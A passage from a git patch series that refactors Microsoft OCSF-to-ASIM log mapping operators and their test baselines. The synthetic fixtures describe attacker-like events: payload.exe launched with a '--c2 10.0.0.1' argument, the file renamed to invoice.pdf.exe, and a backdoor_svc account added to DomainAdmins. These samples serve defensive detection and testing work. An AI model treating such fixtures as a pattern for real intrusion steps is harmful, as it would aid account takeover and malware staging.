2026-01-01T00:00:02Z, + EventEndTime: 2026-01-01T00:00:02Z, + EventProduct: "DNS", + EventVendor: "Microsoft", + EventOriginalUid: "dns-1", + EventUid: "dns-1", + EventOriginalType: "400301", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "dns1", + DvcHostname: "dns1", + DvcFQDN: "dns1", EventSchema: "Dns", EventSchemaVersion: "0.1.7", EventType: "Query", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "dns-1", - Dvc: "dns1", - ActorUsername: null, - TargetFilePath: null, - TargetFilePathType: null, - TargetFileName: null, - SrcFilePath: null, - SrcFileName: null, - SrcIpAddr: 10.0.0.1, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, + EventSubType: "request", DnsQuery: "example.org", DnsQueryTypeName: "A", DnsQueryClassName: "IN", EventResultDetails: "NA", + SrcIpAddr: 10.0.0.1, SrcHostname: null, - SrcMacAddr: null, - Url: null, - HttpRequestMethod: null, + DstIpAddr: null, + DstHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Query", + category_uid: 4, + class_uid: 4003, + class_name: "DNS Activity", + type_uid: 400301, + time: 2026-01-01T00:00:02Z, + severity_id: 1, + status: "Success", + rcode: "NA", + metadata: { + original_event_uid: "dns-1", + product: { + name: "DNS", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "dns1", + }, + query: { + hostname: "example.org", + type: "A", + class: "IN", + }, + src_endpoint: { + ip: 10.0.0.1, + }, + }, + name: "asim.dns", } { - name: "asim.file_event", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:00Z, + EventEndTime: 2026-01-01T00:00:00Z, + EventProduct: "Endpoint", + EventVendor: "Microsoft", + EventOriginalUid: "file-1", + EventUid: "file-1", + EventOriginalType: "100101", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "host1", + DvcHostname: "host1", + DvcFQDN: "host1", EventSchema: "FileEvent", EventSchemaVersion: "0.2.2", EventType: "FileCreated", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "file-1", - Dvc: "host1", ActorUsername: "alice", + ActorUserId: null, TargetFilePath: "C:\\tmp\\payload.exe", - TargetFilePathType: "Windows Local", TargetFileName: "payload.exe", - SrcFilePath: null, - SrcFileName: null, - SrcIpAddr: null, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: null, - SrcHostname: null, - SrcMacAddr: null, - Url: null, - HttpRequestMethod: null, + TargetFilePathType: "Windows Local", + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100101, + time: 2026-01-01T00:00:00Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-1", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + }, + name: "asim.file_event", } { - name: "asim.file_event", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:05Z, + EventEndTime: 2026-01-01T00:00:05Z, + EventProduct: "Endpoint", + EventVendor: "Microsoft", + EventOriginalUid: "file-2", + EventUid: "file-2", + EventOriginalType: "100105", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "host1", + DvcHostname: "host1", + DvcFQDN: "host1", EventSchema: "FileEvent", EventSchemaVersion: "0.2.2", EventType: "FileRenamed", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "file-2", - Dvc: "host1", ActorUsername: "alice", + ActorUserId: null, TargetFilePath: "C:\\tmp\\invoice.pdf.exe", - TargetFilePathType: "Windows Local", TargetFileName: "invoice.pdf.exe", SrcFilePath: "C:\\tmp\\payload.exe", SrcFileName: "payload.exe", - SrcIpAddr: null, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: null, - SrcHostname: null, - SrcMacAddr: null, - Url: null, - HttpRequestMethod: null, + SrcFilePathType: "Windows Local", + TargetFilePathType: "Windows Local", + AdditionalFields: { + activity_id: 5, + activity_name: "Rename", + category_uid: 1, + class_uid: 1001, + class_name: "File System Activity", + type_uid: 100105, + time: 2026-01-01T00:00:05Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "file-2", + product: { + name: "Endpoint", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "host1", + }, + actor: { + user: { + name: "alice", + }, + }, + file: { + path: "C:\\tmp\\payload.exe", + name: "payload.exe", + }, + file_result: { + path: "C:\\tmp\\invoice.pdf.exe", + name: "invoice.pdf.exe", + }, + }, + name: "asim.file_event", } { - name: "asim.network_session", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:01Z, + EventEndTime: 2026-01-01T00:00:01Z, + EventProduct: "Firewall", + EventVendor: "Microsoft", + EventOriginalUid: "net-1", + EventUid: "net-1", + EventOriginalType: "400106", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "fw1", + DvcHostname: "fw1", + DvcFQDN: "fw1", EventSchema: "NetworkSession", EventSchemaVersion: "0.2.7", EventType: "Flow", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "net-1", - Dvc: "fw1", - ActorUsername: null, - TargetFilePath: null, - TargetFilePathType: null, - TargetFileName: null, - SrcFilePath: null, - SrcFileName: null, SrcIpAddr: 10.0.0.1, + SrcHostname: null, SrcPortNumber: 12345, DstIpAddr: 10.0.0.2, + DstHostname: null, DstPortNumber: 443, SrcBytes: 100, DstBytes: 200, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: null, - SrcHostname: null, - SrcMacAddr: null, - Url: null, - HttpRequestMethod: null, + AdditionalFields: { + activity_id: 6, + activity_name: "Traffic", + category_uid: 4, + class_uid: 4001, + class_name: "Network Activity", + type_uid: 400106, + time: 2026-01-01T00:00:01Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "net-1", + product: { + name: "Firewall", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "fw1", + }, + src_endpoint: { + ip: 10.0.0.1, + port: 12345, + }, + dst_endpoint: { + ip: 10.0.0.2, + port: 443, + }, + traffic: { + bytes_out: 100, + bytes_in: 200, + }, + }, + name: "asim.network_session", } { - name: "asim.web_session", + EventCount: 1, + EventStartTime: 2026-01-01T00:00:04Z, + EventEndTime: 2026-01-01T00:00:04Z, + EventProduct: "Proxy", + EventVendor: "Microsoft", + EventOriginalUid: "web-1", + EventUid: "web-1", + EventOriginalType: "400203", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "proxy1", + DvcHostname: "proxy1", + DvcFQDN: "proxy1", EventSchema: "WebSession", EventSchemaVersion: "0.2.7", EventType: "HTTPsession", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalUid: "web-1", - Dvc: "proxy1", - ActorUsername: null, - TargetFilePath: null, - TargetFilePathType: null, - TargetFileName: null, - SrcFilePath: null, - SrcFileName: null, - SrcIpAddr: null, - SrcPortNumber: null, - DstIpAddr: null, - DstPortNumber: null, - SrcBytes: null, - DstBytes: null, - DnsQuery: null, - DnsQueryTypeName: null, - DnsQueryClassName: null, - EventResultDetails: "200", - SrcHostname: null, - SrcMacAddr: null, Url: "https://example.org/index.html", HttpRequestMethod: "GET", + EventResultDetails: "200", + AdditionalFields: { + activity_id: 3, + activity_name: "Get", + category_uid: 4, + class_uid: 4002, + class_name: "HTTP Activity", + type_uid: 400203, + time: 2026-01-01T00:00:04Z, + severity_id: 1, + status: "Success", + metadata: { + original_event_uid: "web-1", + product: { + name: "Proxy", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "proxy1", + }, + http_request: { + http_method: "GET", + url: { + url_string: "https://example.org/index.html", + }, + }, + http_response: { + code: 200, + }, + }, + name: "asim.web_session", } diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/ocsf-to-asim/process.tql index caa54b3..0758530 100644 --- a/microsoft/tests/ocsf-to-asim/process.tql +++ b/microsoft/tests/ocsf-to-asim/process.tql @@ -57,8 +57,3 @@ from { @name = "ocsf.process_activity" microsoft::asim::ocsf::map name = @name -select name, EventSchema, EventSchemaVersion, EventType, EventResult, - EventSeverity, EventOriginalType, DvcHostname, ActorUsername, - ActorUsernameType, ActorUserId, ActorUserIdType, ActingProcessId, - ParentProcessId, TargetProcessId, TargetProcessName, - TargetProcessCommandLine diff --git a/microsoft/tests/ocsf-to-asim/process.txt b/microsoft/tests/ocsf-to-asim/process.txt index ffe7db0..392d9ef 100644 --- a/microsoft/tests/ocsf-to-asim/process.txt +++ b/microsoft/tests/ocsf-to-asim/process.txt @@ -1,12 +1,20 @@ { - name: "asim.process_event", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalUid: "98764", + EventUid: "98764", + EventOriginalType: "4688", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "WINHOST01.corp.local", + DvcHostname: "WINHOST01.corp.local", + DvcFQDN: "WINHOST01.corp.local", EventSchema: "ProcessEvent", EventSchemaVersion: "0.1.4", EventType: "ProcessCreated", - EventResult: "Success", - EventSeverity: "Informational", - EventOriginalType: "4688", - DvcHostname: "WINHOST01.corp.local", ActorUsername: "CORP\\jdoe", ActorUsernameType: "Windows", ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", @@ -16,4 +24,64 @@ TargetProcessId: "6732", TargetProcessName: "payload.exe", TargetProcessCommandLine: "payload.exe --c2 10.0.0.1", + TargetUserId: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Launch", + category_uid: 1, + category_name: "System Activity", + class_uid: 1007, + class_name: "Process Activity", + type_uid: 100701, + type_name: "Process Activity: Launch", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + event_code: "4688", + original_event_uid: "98764", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "WINHOST01.corp.local", + }, + actor: { + process: { + pid: 4660, + name: "wscript.exe", + parent_process: { + pid: 520, + name: "explorer.exe", + }, + }, + session: { + uid_alt: "0xA1B2C3", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + process: { + pid: 6732, + name: "payload.exe", + path: "C:\\tmp\\payload.exe", + cmd_line: "payload.exe --c2 10.0.0.1", + parent_process: { + pid: 4660, + name: "wscript.exe", + }, + }, + }, + name: "asim.process_event", } diff --git a/microsoft/tests/ocsf-to-asim/user-management.tql b/microsoft/tests/ocsf-to-asim/user-management.tql index 037eb44..02832f6 100644 --- a/microsoft/tests/ocsf-to-asim/user-management.tql +++ b/microsoft/tests/ocsf-to-asim/user-management.tql @@ -79,8 +79,3 @@ from { microsoft::asim::ocsf::map name = @name sort EventOriginalType -select name, EventSchema, EventSchemaVersion, EventType, EventResult, - EventSeverity, EventOriginalType, DvcHostname, ActorUsername, - ActorUsernameType, TargetUsername, TargetUsernameType=TargetUsernameType?, - TargetUserId, TargetUserIdType, GroupName=GroupName?, GroupId=GroupId?, - GroupIdType=GroupIdType? diff --git a/microsoft/tests/ocsf-to-asim/user-management.txt b/microsoft/tests/ocsf-to-asim/user-management.txt index 23d95e0..01f6ae5 100644 --- a/microsoft/tests/ocsf-to-asim/user-management.txt +++ b/microsoft/tests/ocsf-to-asim/user-management.txt @@ -1,14 +1,24 @@ { - name: "asim.user_management", - EventSchema: "UserManagement", - EventSchemaVersion: "0.1.2", - EventType: "UserCreated", - EventResult: "NA", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalUid: "98767", + EventUid: "98767", EventOriginalType: "4720", + EventSeverity: "Informational", + EventResult: "NA", + Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", + DvcFQDN: "DC01.corp.local", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", ActorUsername: "CORP\\jdoe", ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", + EventType: "UserCreated", TargetUsername: "CORP\\backdoor_svc", TargetUsernameType: "Windows", TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", @@ -16,23 +26,120 @@ GroupName: null, GroupId: null, GroupIdType: null, + SrcIpAddr: null, + SrcHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3001, + class_name: "Account Change", + type_uid: 300101, + type_name: "Account Change: Create", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + metadata: { + event_code: "4720", + original_event_uid: "98767", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + user: { + domain: "CORP", + name: "backdoor_svc", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, + }, + name: "asim.user_management", } { - name: "asim.user_management", - EventSchema: "UserManagement", - EventSchemaVersion: "0.1.2", - EventType: "UserAddedToGroup", - EventResult: "NA", - EventSeverity: "Informational", + EventCount: 1, + EventStartTime: 2024-03-23T12:34:57Z, + EventEndTime: 2024-03-23T12:34:57Z, + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalUid: "98776", + EventUid: "98776", EventOriginalType: "4728", + EventSeverity: "Informational", + EventResult: "NA", + Dvc: "DC01.corp.local", DvcHostname: "DC01.corp.local", + DvcFQDN: "DC01.corp.local", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", ActorUsername: "CORP\\jdoe", ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", + EventType: "UserAddedToGroup", TargetUsername: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", - TargetUsernameType: null, TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", TargetUserIdType: "SID", GroupName: "DomainAdmins", GroupId: "S-1-5-21-3107921522-2185401913-891411500-512", GroupIdType: "SID", + SrcIpAddr: null, + SrcHostname: null, + AdditionalFields: { + activity_id: 3, + activity_name: "Add User", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3006, + class_name: "Group Management", + type_uid: 300603, + type_name: "Group Management: Add User", + time: 2024-03-23T12:34:57Z, + severity_id: 1, + metadata: { + event_code: "4728", + original_event_uid: "98776", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + group: { + domain: "CORP", + name: "DomainAdmins", + uid: "S-1-5-21-3107921522-2185401913-891411500-512", + }, + user: { + name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, + }, + name: "asim.user_management", } From 6f2b3931b915672c0881e46df9e4cfef5f80b19f Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:18:33 +0200 Subject: [PATCH 15/27] Remove raw mapper arguments Drop the raw-data side channel from the Microsoft OCSF and ASIM mapper UDOs. The mappers now use only the current event as their input, avoiding deferred argument semantics around moved fields. Assisted-by: GPT-5 Codex (Superconductor) --- microsoft/operators/asim/map.tql | 9 ++------- microsoft/operators/asim/ocsf/map.tql | 10 ---------- microsoft/operators/graph/ocsf/map.tql | 10 ---------- microsoft/operators/ocsf/map.tql | 9 ++------- .../windows/ocsf/events/powershell_module_logging.tql | 5 ++--- .../windows/ocsf/events/powershell_script_block.tql | 6 +++--- .../windows/ocsf/events/scheduled_task_create.tql | 2 +- microsoft/operators/windows/ocsf/map.tql | 9 --------- 8 files changed, 10 insertions(+), 50 deletions(-) diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 42fafb5..9b4de4f 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -1,16 +1,11 @@ --- description: Maps supported Microsoft events to Microsoft Sentinel ASIM. -args: - named: - - name: raw - description: Raw Microsoft event to preserve in OCSF `raw_data` before ASIM mapping. - default: null --- if class_uid? == null { - microsoft::ocsf::map raw=$raw + microsoft::ocsf::map ocsf::derive ocsf::cast } -microsoft::asim::ocsf::map $raw +microsoft::asim::ocsf::map diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index f9ffffb..f9025c4 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql @@ -1,17 +1,7 @@ --- description: Maps validated OCSF 1.8 events to Microsoft Sentinel ASIM. -args: - positional: - - name: raw - description: Raw Microsoft event to preserve in OCSF `raw_data` before ASIM mapping. - default: null --- -if $raw != null { - raw_data = $raw - raw_data_size = $raw.length_bytes() -} - match class_uid { 2003 => { microsoft::asim::ocsf::compliance_finding diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 84872d0..b8506f5 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -1,19 +1,9 @@ --- description: Microsoft Graph → OCSF -args: - named: - - name: raw - description: Raw Microsoft Graph event to preserve in OCSF `raw_data`. - default: null --- this = {graph: this, ocsf: {}} -if $raw != null { - ocsf.raw_data = $raw - ocsf.raw_data_size = $raw.length_bytes() -} - ocsf.cloud = { provider: "Azure", } diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql index 004d099..5208749 100644 --- a/microsoft/operators/ocsf/map.tql +++ b/microsoft/operators/ocsf/map.tql @@ -1,14 +1,9 @@ --- description: Maps supported Microsoft events to OCSF. -args: - named: - - name: raw - description: Raw Microsoft event to preserve in OCSF `raw_data`. - default: null --- if @name == "microsoft.windows.eventlog" or System? != null { - microsoft::windows::ocsf::map raw=$raw + microsoft::windows::ocsf::map } else { - microsoft::graph::ocsf::map raw=$raw + microsoft::graph::ocsf::map } diff --git a/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql b/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql index 598ea57..0e773a1 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_module_logging.tql @@ -17,8 +17,7 @@ ocsf.script = { } // Payload contains the command invocation and parameter bindings as plain text; -// preserve verbatim in unmapped — parsing it would require regex surgery and -// the raw content is already in raw_data. +// preserve verbatim in unmapped because parsing it would require regex surgery. // // ContextInfo is a multi-line key=value block with host, engine, runspace, -// pipeline, user, and shell info; also left in unmapped for the same reason. +// pipeline, user, and shell info; also left in unmapped. diff --git a/microsoft/operators/windows/ocsf/events/powershell_script_block.tql b/microsoft/operators/windows/ocsf/events/powershell_script_block.tql index cbc7c2e..d7db994 100644 --- a/microsoft/operators/windows/ocsf/events/powershell_script_block.tql +++ b/microsoft/operators/windows/ocsf/events/powershell_script_block.tql @@ -29,6 +29,6 @@ if windows.EventData.Path? != null and windows.EventData.Path? != "" { ocsf.script.name = ocsf.script.file.name } -// ScriptBlockText is the raw script content — potentially large and already -// preserved verbatim in raw_data. MessageNumber/MessageTotal indicate chunked -// multi-part blocks. Both stay in unmapped for downstream consumers. +// ScriptBlockText is the raw script content and can be large. +// MessageNumber/MessageTotal indicate chunked multi-part blocks. +// These fields stay in unmapped for downstream consumers. diff --git a/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql b/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql index 65bf34a..9c6c4f0 100644 --- a/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql +++ b/microsoft/operators/windows/ocsf/events/scheduled_task_create.tql @@ -30,6 +30,6 @@ ocsf.job = { // TaskContent is an XML string describing triggers and actions. It is // intentionally left in unmapped — parsing it would require an XML operator -// and the content is already preserved verbatim in raw_data. +// and downstream consumers can parse it if needed. // ClientProcessStartKey, ParentProcessId, RpcCallClientLocality, FQDN also // remain in unmapped. diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index 33c3f9b..ef62c4b 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -1,17 +1,8 @@ --- description: Structured Microsoft Windows Event Log → OCSF -args: - named: - - name: raw - description: Raw Windows Event Log XML to preserve in OCSF `raw_data`. - default: null --- this = {windows: this, ocsf: {}} -if $raw != null { - ocsf.raw_data = $raw - ocsf.raw_data_size = $raw.length_bytes() -} ocsf.metadata = { event_code: windows.System.EventID.string(), From d81cdcdb1000d64b520de94c8bf00de79a3894f9 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Mon, 8 Jun 2026 18:22:44 +0200 Subject: [PATCH 16/27] Align ASIM OCSF tests Move the Microsoft OCSF-to-ASIM tests under the ASIM OCSF test tree so their layout mirrors the operator package. Split the broad user-management and direct-target cases into per-operator baselines. Assisted-by: GPT-5 (Codex) --- .../ocsf/account_change.tql} | 1 + microsoft/tests/asim/ocsf/account_change.txt | 71 ++++ .../ocsf}/authentication.tql | 0 .../ocsf}/authentication.txt | 0 .../ocsf/detection_finding.tql} | 0 .../ocsf/detection_finding.txt} | 0 .../ocsf/dhcp_activity.tql} | 1 + microsoft/tests/asim/ocsf/dhcp_activity.txt | 49 +++ microsoft/tests/asim/ocsf/dns_activity.tql | 188 ++++++++++ microsoft/tests/asim/ocsf/dns_activity.txt | 59 +++ .../ocsf/event_log_activity.tql} | 0 .../ocsf/event_log_activity.txt} | 0 .../tests/asim/ocsf/file_system_activity.tql | 188 ++++++++++ .../tests/asim/ocsf/file_system_activity.txt | 117 ++++++ .../tests/asim/ocsf/group_management.tql | 82 +++++ .../ocsf/group_management.txt} | 71 ---- microsoft/tests/asim/ocsf/http_activity.tql | 188 ++++++++++ microsoft/tests/asim/ocsf/http_activity.txt | 53 +++ .../ocsf/map.tql} | 0 .../ocsf/map.txt} | 0 .../tests/asim/ocsf/network_activity.tql | 188 ++++++++++ .../tests/asim/ocsf/network_activity.txt | 61 ++++ .../ocsf/process_activity.tql} | 0 .../ocsf/process_activity.txt} | 0 .../tests/ocsf-to-asim/direct-targets.txt | 339 ------------------ 25 files changed, 1246 insertions(+), 410 deletions(-) rename microsoft/tests/{ocsf-to-asim/user-management.tql => asim/ocsf/account_change.tql} (98%) create mode 100644 microsoft/tests/asim/ocsf/account_change.txt rename microsoft/tests/{ocsf-to-asim => asim/ocsf}/authentication.tql (100%) rename microsoft/tests/{ocsf-to-asim => asim/ocsf}/authentication.txt (100%) rename microsoft/tests/{ocsf-to-asim/alert.tql => asim/ocsf/detection_finding.tql} (100%) rename microsoft/tests/{ocsf-to-asim/alert.txt => asim/ocsf/detection_finding.txt} (100%) rename microsoft/tests/{ocsf-to-asim/direct-targets.tql => asim/ocsf/dhcp_activity.tql} (99%) create mode 100644 microsoft/tests/asim/ocsf/dhcp_activity.txt create mode 100644 microsoft/tests/asim/ocsf/dns_activity.tql create mode 100644 microsoft/tests/asim/ocsf/dns_activity.txt rename microsoft/tests/{ocsf-to-asim/audit.tql => asim/ocsf/event_log_activity.tql} (100%) rename microsoft/tests/{ocsf-to-asim/audit.txt => asim/ocsf/event_log_activity.txt} (100%) create mode 100644 microsoft/tests/asim/ocsf/file_system_activity.tql create mode 100644 microsoft/tests/asim/ocsf/file_system_activity.txt create mode 100644 microsoft/tests/asim/ocsf/group_management.tql rename microsoft/tests/{ocsf-to-asim/user-management.txt => asim/ocsf/group_management.txt} (52%) create mode 100644 microsoft/tests/asim/ocsf/http_activity.tql create mode 100644 microsoft/tests/asim/ocsf/http_activity.txt rename microsoft/tests/{ocsf-to-asim/unsupported-strict.tql => asim/ocsf/map.tql} (100%) rename microsoft/tests/{ocsf-to-asim/unsupported-strict.txt => asim/ocsf/map.txt} (100%) create mode 100644 microsoft/tests/asim/ocsf/network_activity.tql create mode 100644 microsoft/tests/asim/ocsf/network_activity.txt rename microsoft/tests/{ocsf-to-asim/process.tql => asim/ocsf/process_activity.tql} (100%) rename microsoft/tests/{ocsf-to-asim/process.txt => asim/ocsf/process_activity.txt} (100%) delete mode 100644 microsoft/tests/ocsf-to-asim/direct-targets.txt diff --git a/microsoft/tests/ocsf-to-asim/user-management.tql b/microsoft/tests/asim/ocsf/account_change.tql similarity index 98% rename from microsoft/tests/ocsf-to-asim/user-management.tql rename to microsoft/tests/asim/ocsf/account_change.tql index 02832f6..64b9b0a 100644 --- a/microsoft/tests/ocsf-to-asim/user-management.tql +++ b/microsoft/tests/asim/ocsf/account_change.tql @@ -76,6 +76,7 @@ from { }, } @name = "ocsf.account_change" +where class_uid == 3001 microsoft::asim::ocsf::map name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/account_change.txt b/microsoft/tests/asim/ocsf/account_change.txt new file mode 100644 index 0000000..c1220d0 --- /dev/null +++ b/microsoft/tests/asim/ocsf/account_change.txt @@ -0,0 +1,71 @@ +{ + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56.789012300Z, + EventEndTime: 2024-03-23T12:34:56.789012300Z, + EventProduct: "Microsoft-Windows-Security-Auditing", + EventVendor: "Microsoft", + EventOriginalUid: "98767", + EventUid: "98767", + EventOriginalType: "4720", + EventSeverity: "Informational", + EventResult: "NA", + Dvc: "DC01.corp.local", + DvcHostname: "DC01.corp.local", + DvcFQDN: "DC01.corp.local", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", + EventType: "UserCreated", + TargetUsername: "CORP\\backdoor_svc", + TargetUsernameType: "Windows", + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", + TargetUserIdType: "SID", + GroupName: null, + GroupId: null, + GroupIdType: null, + SrcIpAddr: null, + SrcHostname: null, + AdditionalFields: { + activity_id: 1, + activity_name: "Create", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3001, + class_name: "Account Change", + type_uid: 300101, + type_name: "Account Change: Create", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + metadata: { + event_code: "4720", + original_event_uid: "98767", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: [ + "host", + ], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + user: { + domain: "CORP", + name: "backdoor_svc", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, + }, + name: "asim.user_management", +} diff --git a/microsoft/tests/ocsf-to-asim/authentication.tql b/microsoft/tests/asim/ocsf/authentication.tql similarity index 100% rename from microsoft/tests/ocsf-to-asim/authentication.tql rename to microsoft/tests/asim/ocsf/authentication.tql diff --git a/microsoft/tests/ocsf-to-asim/authentication.txt b/microsoft/tests/asim/ocsf/authentication.txt similarity index 100% rename from microsoft/tests/ocsf-to-asim/authentication.txt rename to microsoft/tests/asim/ocsf/authentication.txt diff --git a/microsoft/tests/ocsf-to-asim/alert.tql b/microsoft/tests/asim/ocsf/detection_finding.tql similarity index 100% rename from microsoft/tests/ocsf-to-asim/alert.tql rename to microsoft/tests/asim/ocsf/detection_finding.tql diff --git a/microsoft/tests/ocsf-to-asim/alert.txt b/microsoft/tests/asim/ocsf/detection_finding.txt similarity index 100% rename from microsoft/tests/ocsf-to-asim/alert.txt rename to microsoft/tests/asim/ocsf/detection_finding.txt diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql similarity index 99% rename from microsoft/tests/ocsf-to-asim/direct-targets.tql rename to microsoft/tests/asim/ocsf/dhcp_activity.tql index aaecf95..c1e5d1f 100644 --- a/microsoft/tests/ocsf-to-asim/direct-targets.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql @@ -182,6 +182,7 @@ from { code: 200, }, } +where class_uid == 4004 microsoft::asim::ocsf::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.txt b/microsoft/tests/asim/ocsf/dhcp_activity.txt new file mode 100644 index 0000000..180e62e --- /dev/null +++ b/microsoft/tests/asim/ocsf/dhcp_activity.txt @@ -0,0 +1,49 @@ +{ + EventCount: 1, + EventStartTime: 2026-01-01T00:00:03Z, + EventEndTime: 2026-01-01T00:00:03Z, + EventProduct: "DHCP", + EventVendor: "Microsoft", + EventOriginalUid: "dhcp-1", + EventUid: "dhcp-1", + EventOriginalType: "400405", + EventSeverity: "Informational", + EventResult: "Success", + 